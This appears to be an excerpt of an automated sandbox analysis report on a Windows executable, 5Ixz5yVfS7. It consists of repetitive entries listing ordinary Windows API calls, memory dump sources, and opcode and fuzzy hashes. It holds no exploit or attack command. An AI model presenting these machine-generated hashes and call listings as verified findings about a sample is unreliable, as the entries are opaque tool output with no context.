                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  • Opcode ID: e9f1861166165c4d2aef82be62b715f0ae4178d6390d89b349050ac574257031
                  • Instruction ID: 051cf1588e0c0662335c29752316c2c0d2f181f94c66b289956c4dc8b972465a
                  • Opcode Fuzzy Hash: e9f1861166165c4d2aef82be62b715f0ae4178d6390d89b349050ac574257031
                  • Instruction Fuzzy Hash: C841F77050424C9EEB228A68CC99AFABFA9FB45304F1404EDE59A87142D3B5AE45DF20
                  APIs
                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 005BA79D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx
                  • API String ID: 2568140703-3893581201
                  • Opcode ID: 566183167019a7693069d0f922f55299cfdfafc02e76b460cd1727862c31b385
                  • Instruction ID: 7082eb3ce80ca18a97365f730831e984633ee5f9c4a8035a312d50ffbf82ffb2
                  • Opcode Fuzzy Hash: 566183167019a7693069d0f922f55299cfdfafc02e76b460cd1727862c31b385
                  • Instruction Fuzzy Hash: 4501023250420DBBCF025FA0DD06DEE7F76FB48720F018554FE1425160CA729921BB91
                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,005B9D2F), ref: 005BA715
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 005BA6E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 2593887523-3084827643
                  • Opcode ID: 0b71a5cb79bda2af539ceb963aa8e1c8cc0cef0962cdf99313f49af487c3c2ac
                  • Instruction ID: e86ee43ca70ae32ac2568c2c64ab637fb4a4133767461a351fc2f2d09a34e9c9
                  • Opcode Fuzzy Hash: 0b71a5cb79bda2af539ceb963aa8e1c8cc0cef0962cdf99313f49af487c3c2ac
                  • Instruction Fuzzy Hash: ABF09A3164561CBFCB116FA0DC0ADAE7F61FB59B20B008468FC091A260DA716A50AB91
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  • Opcode ID: 5bf649ed2d27feba2cddef93f317a4984cebd78bc26f555633c138bd5e77fae6
                  • Instruction ID: 89fe6d6b2a3a07f382af8f6e2878a8c8c06945858e6456af971cf31b4bd85928
                  • Opcode Fuzzy Hash: 5bf649ed2d27feba2cddef93f317a4984cebd78bc26f555633c138bd5e77fae6
                  • Instruction Fuzzy Hash: 41E05C7074561C6FC7206B949C06DEDBF64FB65B10B404018FC0417240DD746F41A6D5
                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 005B32AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  • Opcode ID: ba69fbc8aa1a53edec3ae6246a3412bffe80a87bc39d1790db315a615304376a
                  • Instruction ID: 0d4521666ea9c9353e560d3824941fde0c03b214b5bdf147bff44e286d6d5152
                  • Opcode Fuzzy Hash: ba69fbc8aa1a53edec3ae6246a3412bffe80a87bc39d1790db315a615304376a
                  • Instruction Fuzzy Hash: AED02B31780B397E821032C46C03FEEBE04A701FB5F450152FE082A242A46169C043C5
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AE20B
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID: 3Qo
                  • API String ID: 1269201914-1944013411
                  • Opcode ID: 90e641b82071a765c011c148a699d4ca365b392a3d6eefd12af473eccd81c0ac
                  • Instruction ID: 446af79da1c1d20e9ae14b54397b2b4d8de0c0ed5204cbea74c96481d5b9e4f3
                  • Opcode Fuzzy Hash: 90e641b82071a765c011c148a699d4ca365b392a3d6eefd12af473eccd81c0ac
                  • Instruction Fuzzy Hash: 29B012D62AE0027D320C61407D0FE3F0F3CF8C1F90730841EB207D408099404D054032
                  APIs
                    • Part of subcall function 005BAF1B: GetOEMCP.KERNEL32(00000000,?,?,005BB1A5,?), ref: 005BAF46
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,005BB1EA,?,00000000), ref: 005BB3C4
                  • GetCPInfo.KERNEL32(00000000,005BB1EA,?,?,?,005BB1EA,?,00000000), ref: 005BB3D7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: 6351fb7b4e662e2a6fc66d14a40811bc7f850ec2f99c1e09b738315bb839b23c
                  • Instruction ID: f63343427cb7e79e4e36ef240ea65cc64bacd5f72208f0c87546bfc930a523c8
                  • Opcode Fuzzy Hash: 6351fb7b4e662e2a6fc66d14a40811bc7f850ec2f99c1e09b738315bb839b23c
                  • Instruction Fuzzy Hash: 4C5112B09002069EEF209F71C885AFABFE6FF41310F18856ED09686253D7F9B945CB91
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 005A2DA4
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 005A2DBC
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Exception@8Throw
                  • String ID:
                  • API String ID: 2005118841-0
                  • Opcode ID: 9845a50216893f17ec8da3d7d094b8d4de7a4423894c271f6db00c8fefdd5daa
                  • Instruction ID: 027b13ce4c44bf4b50cfc93ea59c377cfb0f937dadfe3f2e7e46d37b3500c633
                  • Opcode Fuzzy Hash: 9845a50216893f17ec8da3d7d094b8d4de7a4423894c271f6db00c8fefdd5daa
                  • Instruction Fuzzy Hash: 0A413AB0A087426FD72CEB78E49AB9EFF94BF92304F04052EE55953183C770A854C796
                  APIs
                  • __EH_prolog.LIBCMT ref: 00591385
                    • Part of subcall function 00596057: __EH_prolog.LIBCMT ref: 0059605C
                    • Part of subcall function 0059C827: __EH_prolog.LIBCMT ref: 0059C82C
                    • Part of subcall function 0059C827: new.LIBCMT ref: 0059C86F
                    • Part of subcall function 0059C827: new.LIBCMT ref: 0059C893
                  • new.LIBCMT ref: 005913FE
                    • Part of subcall function 0059B07D: __EH_prolog.LIBCMT ref: 0059B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a3166fec72a7bc812e326b61927ac961c0c9faf8948b0a48f448285db1e8a664
                  • Instruction ID: 13741cef7fe79700ca1a65f35a4d3082ffd612a866467330de288e55f4b922df
                  • Opcode Fuzzy Hash: a3166fec72a7bc812e326b61927ac961c0c9faf8948b0a48f448285db1e8a664
                  • Instruction Fuzzy Hash: B14126B0805B419EEB24DF7984899E6FFE5FF19300F404A2ED2EE83282DB326554CB15
                  APIs
                  • __EH_prolog.LIBCMT ref: 00591385
                    • Part of subcall function 00596057: __EH_prolog.LIBCMT ref: 0059605C
                    • Part of subcall function 0059C827: __EH_prolog.LIBCMT ref: 0059C82C
                    • Part of subcall function 0059C827: new.LIBCMT ref: 0059C86F
                    • Part of subcall function 0059C827: new.LIBCMT ref: 0059C893
                  • new.LIBCMT ref: 005913FE
                    • Part of subcall function 0059B07D: __EH_prolog.LIBCMT ref: 0059B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 1fb6a33b1925713eb645e5e20e46e2daf1dfb521970677e2f01b74d5a2ccba36
                  • Instruction ID: 486a0d9ba94c1d7f3270ee962df2c5da39ceb43f966abd996000f9336078c892
                  • Opcode Fuzzy Hash: 1fb6a33b1925713eb645e5e20e46e2daf1dfb521970677e2f01b74d5a2ccba36
                  • Instruction Fuzzy Hash: 864116B0805B419EEB24DF798489AE6FEE5FF19300F504A2ED1EE83282DB326554CB15
                  APIs
                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00599EDC,?,?,00597867), ref: 005997A6
                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00599EDC,?,?,00597867), ref: 005997DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 96a2446147f512e506999edf1245d11a7e619fe0701348479cb444a1427ffdfd
                  • Instruction ID: d409915d476ec5580060b27fcdc83974c4b91dfdcbb5293a84314fa31b216f97
                  • Opcode Fuzzy Hash: 96a2446147f512e506999edf1245d11a7e619fe0701348479cb444a1427ffdfd
                  • Instruction Fuzzy Hash: 7221F8B1110749AFEB308F98C889FA77BE8FB4A764F00491DF5D582191C775AC489B61
                  APIs
                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00597547,?,?,?,?), ref: 00599D7C
                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00599E2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: File$BuffersFlushTime
                  • String ID:
                  • API String ID: 1392018926-0
                  • Opcode ID: 3b241c5b7917cb8a62ed49a46216c977d47aee3247c8369fd4b958b55623d204
                  • Instruction ID: ad5f003e9b324c0d7b4aae3f8617e60e4124a2348599710a9f1801b12a21c72a
                  • Opcode Fuzzy Hash: 3b241c5b7917cb8a62ed49a46216c977d47aee3247c8369fd4b958b55623d204
                  • Instruction Fuzzy Hash: AF21D63215834AAFDB14DE29C495EABBFE8BF96704F04481CB4C187541D329DA0CDBA1
                  APIs
                  • GetProcAddress.KERNEL32(00000000,005C3958), ref: 005BA4B8
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005BA4C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: b1f1ead986039a48cd3e49cc71b4fee57d722e5f2c4eeab6fb05854310d7c8ea
                  • Instruction ID: d3f08cf72fd8e92b03922c84769598c502b0ee0542343dcb20fe0f7da44fda94
                  • Opcode Fuzzy Hash: b1f1ead986039a48cd3e49cc71b4fee57d722e5f2c4eeab6fb05854310d7c8ea
                  • Instruction Fuzzy Hash: DC113A33A105219F9F259E28FC49CEA7BA5BB813207164120FD15EB244EB74FC45D6D2
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00599B35,?,?,00000000,?,?,00598D9C,?), ref: 00599BC0
                  • GetLastError.KERNEL32 ref: 00599BCD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 482ac8a47c38c09a8ad29a25ade748524e83ef12ed74be851efa9cabe7afdf87
                  • Instruction ID: 515e19e8ba38c3e613f37297459ad1904d0f20d50b9114b438d1fe56950570af
                  • Opcode Fuzzy Hash: 482ac8a47c38c09a8ad29a25ade748524e83ef12ed74be851efa9cabe7afdf87
                  • Instruction Fuzzy Hash: 23012B763092059F8F08CF6DAC9497EBB9BBFC0321B14852DF81687280CA38DC05A721
                  APIs
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00599E76
                  • GetLastError.KERNEL32 ref: 00599E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: df6e49333ef4b957b5715146876ec663c8c571fe2b11cd9e3dabef892fb1560e
                  • Instruction ID: 596d2e87bbf7df8792813d81420ff0d62995b70331bdcee1f9022fc9c017fe0c
                  • Opcode Fuzzy Hash: df6e49333ef4b957b5715146876ec663c8c571fe2b11cd9e3dabef892fb1560e
                  • Instruction Fuzzy Hash: BE019A727052056FEF34DE2DDC88B6BBADDAB88325F14893EB146C2680DA31EC4C8611
                  APIs
                  • _free.LIBCMT ref: 005B8627
                    • Part of subcall function 005B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A
                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,005D0F50,0059CE57,?,?,?,?,?,?), ref: 005B8663
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Heap$AllocAllocate_free
                  • String ID:
                  • API String ID: 2447670028-0
                  • Opcode ID: 79ca8d56f74118a2f9dab5a20af872f905e310b9e53369a592b37ab8e3bb683c
                  • Instruction ID: 813a167f2bf0f99464e3c9bcc6042d8cef13d7f2ae1b3f81f8a3f5326c7a6d2b
                  • Opcode Fuzzy Hash: 79ca8d56f74118a2f9dab5a20af872f905e310b9e53369a592b37ab8e3bb683c
                  • Instruction Fuzzy Hash: 61F06231101516AADB212E25AC05FFB2F5CBFF17A0F286515F82596191DE30F801D5A5
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?), ref: 005A0915
                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 005A091C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1231390398-0
                  • Opcode ID: 9cd0d04e4a2413760bc53765c0ca907023d079a14704773261baf2c4a65613ca
                  • Instruction ID: 601676ed4d5144dc14fd261e380c86d435dcd986da4845e35e810a0c4bc9b930
                  • Opcode Fuzzy Hash: 9cd0d04e4a2413760bc53765c0ca907023d079a14704773261baf2c4a65613ca
                  • Instruction Fuzzy Hash: E3E09233A20109AFAF09DAA49C088BF7B9DFB1A3147209179A907D3241F931DE0586A1
                  APIs
                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0059A27A,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A458
                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0059A27A,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A489
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 183f9285206aafec13372ecd495967e2c591a19720e42e27472187305121196b
                  • Instruction ID: 22bd09fa9fb2858bfd7a02cde7cc6e175ec94e67d6ae05de6a9cca027cde3321
                  • Opcode Fuzzy Hash: 183f9285206aafec13372ecd495967e2c591a19720e42e27472187305121196b
                  • Instruction Fuzzy Hash: F2F0303124020DBBEF115F60DC49FDA7B6CBB05785F448051BC8C96161DB769AA8AAA0
                  APIs
